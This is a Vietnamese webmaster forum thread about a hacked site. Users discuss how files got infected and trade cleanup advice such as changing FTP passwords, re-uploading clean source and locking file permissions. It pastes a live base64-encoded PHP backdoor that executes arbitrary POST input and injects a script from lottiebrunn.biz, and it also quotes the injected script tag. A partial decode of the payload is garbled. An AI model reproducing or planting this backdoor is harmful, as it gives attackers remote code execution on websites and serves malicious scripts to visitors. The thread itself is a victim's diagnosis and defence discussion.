hôm nay vào web để ý cái status của FF thấy nó frame 1 cái web mà từ trước tới giờ chưa biết đến view source thì chẳng thấy cái web lạ nào hết vào host check cái source ở mấy file index.php thì thấy bị chèn vào 1 đoạn mã


<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygncH Nzd2cnKSl7ZnVuY3Rpb24gcHNzd2coJHMpe2lmKHByZWdfbWF0 Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcy wkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9k ZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW1 5cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8 fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLC R2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYo JGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJi ZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9y ZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJy M8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcm VnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlsw LTldW1wnIj4g***kaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJi Yhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZS gkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1z dHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2 RDQnpjbU05YUhSMGNEb3ZMMnh2ZEhScFpXSnlkVzV1TG1KcGVp OXBiV0ZuWlhNdloybG1hVzFuTG5Cb2NDQStQQzl6WTNKcGNIUS snKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1w cmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLC RzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7 cmV0dXJuJHM7fWZ1bmN0aW9uIHBzc3dnMigkYSwkYiwkYywkZC l7Z2xvYmFsJHBzc3dnMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9u X2V4aXN0cygkcHNzd2cxKSljYWxsX3VzZXJfZnVuYygkcHNzd2 cxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVz KDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdwc3N3Zycpcm V0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7 ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW 5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRp Pj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKT tvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3Bzc3dnJyk7Zm9y KCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWy RpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHBzc3dnbD0oKCRh PUBzZXRfZXJyb3JfaGFuZGxlcigncHNzd2cyJykpIT0ncHNzd2 cyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKT s=')); ?><?php


không biết có ai bị dính như mình ko ha

Cho em hỏi làm sao mà web bị virus? Bằng cách nào? Cách bảo vệ?

Khả năng dễ xảy ra nhất là máy bạn nhiễm virus nên khi upload lên nó thế
Khả năng thứ 2 là server bị nhiễm virus

Khả năng thứ 3 là bị local chèn Iframe

mình bị chèn cái script này

<script src=http://lottiebrunn.biz/images/gifimg.php ><⁄script> mấy bữa nay nghỉ tết thì mình chẳng đụng chạm gì liên quan đến host hết. tức 1 cái là view source ko thấy cái script đâu hết và kiểm tra ở mấy file index.php đâu hết cái script trên là do bên quản trị server cung cấp nên mới biết được

Đây là loại Virus lây truyền trên server, chúng sẽ tự động add vào các đoạn script được mã hóa hoặc không mã hóa mặc định vào các file như index.php, index.html, default.html, .js v.v... Mình cũng từng bị nên rút ra được vài cách sau, mong là giúp dc anh em :
- Đổi ngay Password FTP và trang Control Panel của bạn
- Xóa hết source cũ và Upload source mới ( sạch ) lên thay thế
- Chmod các file như index.php, index.html v.v... thành 404 để chặn quyền ghi
- Scan virus ngay tại máy tính của bạn để bảo đảm bộ source của bạn là sạch 100%
- Liên hệ với chủ Server để họ kiểm tra và scan lại server của mình.

cảm ơn yodownload nó còn chèn nhiều hơn thế nữa. hôm nào kiểm tra thì chèn có 1 script đến hôm nay thì đến 4 script. và một số file có tên là mysql.php,... nó cũng chèn luôn. và trong thu mục images nó cũng tạo thêm 1 cái đoạn php mã hóa, rất tiếc là mình đã xóa nên ko nhớ tên nữa

cảm ơn yodownload nó còn chèn nhiều hơn thế nữa. hôm nào kiểm tra thì chèn có 1 script đến hôm nay thì đến 4 script. và một số file có tên là mysql.php,... nó cũng chèn luôn. và trong thu mục images nó cũng tạo thêm 1 cái đoạn php mã hóa, rất tiếc là mình đã xóa nên ko nhớ tên nữa
Vậy là server của bạn bị dính SEO rồi, không đơn thuần là Virus nữa đâu, bạn nên liên hệ với chủ Server để config lại , scan Shell kỹ lại đi.

vậy virus này giỏi như hack ấy nhỉ, nó thích sửa source lúc nào là sửa àh

giỏi hay không thì mình ko biết nhưng nó tự động chèn vào là thấy hay rồi. nếu con người thì chẳng phải làm 1 ma trận script lung tung và nếu con người thì đã viết email cảnh báo hoặc drop data rồi

giỏi hay không thì mình ko biết nhưng nó tự động chèn vào là thấy hay rồi. nếu con người thì chẳng phải làm 1 ma trận script lung tung và nếu con người thì đã viết email cảnh báo hoặc drop data rồi
Mục đích nó chèn Iframe vào source của bạn là để ăn cắp traffic và bot rank cho mình nên nếu drop data thì lộ liễu rồi ^^

decode thử thì ra cái này


if(!function_exists('psswg')){function psswg($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'', $s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ‘¥ÍÁ±…åq̀¨éq̀©¹½¹”¤œ°‘Ø ¤˜˜…ÍÑÉÍÑÈ ‘Ø°œüœ¸œøœ¤¤� �̀ơÁÉ•}É•Á±…” œŒœ¹ÁÉ•� �}ÅƠ½Ñ” ‘Ø°œŒœ¤¸œ¸¨üđ½¥™� �…µ”ø¥̀œ°œœ°‘̀¤́‘̀ơÍÑÉ} É•Á±…” ‘„ơ‰…Í”ØÑ}‘•� �½‘” A!9©µ±Ư‘ 鍵4å…!HÁ½Ù0ÉáÙ‘!IÁi])å‘\ƠƠ1µ)Á•¤åÁ‰]¹ia5Ùhɱµ…\Ź1¹ ½­AåédÍ)Á!D¬œ¤°œœ°‘̀¤í¥˜¡ ÍÑÉ¥ÍÑÈ ‘̀°œñ‰½‘䜤¤‘̀ơ ÁÉ•}É•Á±…” œŒ¡q̀¨ñ‰½‘ 䤍µ¤œ°‘„¸pÄœ°‘̀°Ä¤í•±� �•¥˜¡ÍÑÉÁ½̀ ‘̀°œñ„œ¤¤‘̀� �‘„¸‘̀íÉ•ÑƠɸ‘̀íơ™Ơ¹Ñ� �½¸ÁÍÍƯœÈ ‘„°‘ˆ°‘Œ°‘¥ 흱½‰…°‘ÁÍÍƯœÄ́‘̀ơ…ÉÉ… ä ¤í¥˜¡™Ơ¹Ñ¥½¹}•á¥ÍÑ̀ ‘ ÁÍÍƯœÄ¤¥…±±}ƠÍ•É}™Ơ¹Œ ‘ ÁÍÍƯœÄ°‘„°‘ˆ°‘Œ°‘¤í™½ É•… ¡½‰}•Ñ}ÍÑ…ÑỜ Ä¥… ̀‘Ø¥¥˜  ‘„ô‘Ùl¹…µ”t¤ô ôÁÍÍƯœœ¥É•ÑƠɸ핱͕¥˜ � ��„ôô½‰}é¡…¹‘±•Èœ¥‰É• …¬í•±Í”‘Ímtơ…ÉÉ…ä ‘„ôô ‘•™…Ơ±Đ½ƠÑÁƠЁ¡…¹‘±� �Èœư™…±Í”è‘„¤í™½È ‘¤ơ ½Ơ¹Đ ‘̀¤´Ä́‘¤øôÀ́‘¤´´¥́� ��Íl‘¥ulÅtơ½‰}•Ñ}½¹Ñ•¹Ñ̀  ¤í½‰}•¹‘}±•…¸ ¤íơ½‰}ÍÑ� ��ÉĐ ÁÍÍƯœœ¤í™½È ‘¤ôÀ́‘� �ñ½Ơ¹Đ ‘̀¤́‘¤¬¬¥í½‰}ÍÑ… ÉĐ ‘Íl‘¥ulÁt¤í•¡¼€‘Íl‘¥u lÅtíơơô‘ÁÍÍƯ°ô  ‘„ơÍ•Ñ}� ��ÉɽÉ}¡…¹‘±•È ÁÍÍƯœÈœ¤¤ „ôÁÍÍƯœÈœ¤ü‘„èÀí•Ù…°¡� ��…Í”ØÑ}‘•½‘” ‘}A=MQl”t ¤¤́


code gần cuối chẳng hiểu mô tê gì cả

@yodownload sao mình ko thể chmod các file index.php & index.html thành 404 hoặc 444. nớ cứ ở 604 mình dùng cuteftp. cái này liên hệ với quản lý server hay là mình tự chmod thế bạn

@yodownload sao mình ko thể chmod các file index.php & index.html thành 404 hoặc 444. nớ cứ ở 604 mình dùng cuteftp. cái này liên hệ với quản lý server hay là mình tự chmod thế bạn
Chmod kiểu này bạn không thể làm trên các trình FTP bình thường được đâu, nếu bạn có phần CHMOD trong File Manager của trang quản trị hoặc dùng SSH thì mới CHMOD 404 được.

hom nay mình vào GG analytics thì thấy 1 refer từ 1 web khác có check tool cũng dày IP mình tình nghi là có kẽ đã local cảm ơn bạn yodownload

hom nay mình vào GG analytics thì thấy 1 refer từ 1 web khác có check tool cũng dày IP mình tình nghi là có kẽ đã local cảm ơn bạn yodownload
Nếu đúng bị Local thì bạn nên scan kỹ database source của mình, chưa nên vội chmod các file index vì để còn phát hiện triệu chứng, một khi đã tìm ra "hàng" thì tìm cách clear rồi CHMOD cũng như config kỹ lại.

nan giải nhỉ,dính virus trên local đã quá đau đầu rồi